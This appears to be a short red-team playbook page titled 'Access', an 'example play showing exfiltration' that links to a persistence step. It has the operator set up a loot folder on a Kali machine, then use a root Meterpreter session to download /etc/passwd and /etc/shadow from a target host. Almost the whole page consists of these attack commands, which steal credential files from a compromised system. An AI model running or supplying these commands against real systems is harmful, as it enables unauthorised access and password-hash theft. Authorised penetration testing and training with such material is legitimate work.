# Access

[TOC]

## Vars

| Variable | Value      | Description |
| -------- | ---------- | ----------- |
| TARGET   | {{TARGET}} | The target running SSH |

## Description

Example play showing exfiltration.

## Steps

### Prereqs

Use the `root` meterpreter session from [persist](persist.md)

### File Organization

Organize files on your Kali system

```{: .host .host-title}
mkdir -p /opt/rtfm/loot/{{TARGET}}/etc
```

### Download Files

Use the root meterpreter session to exfiltrate files over HTTPs.

```{: .msf .msf-title}
download /etc/passwd /opt/rtfm/loot/{{TARGET}}/etc/
download /etc/shadow /opt/rtfm/loot/{{TARGET}}/etc/
```
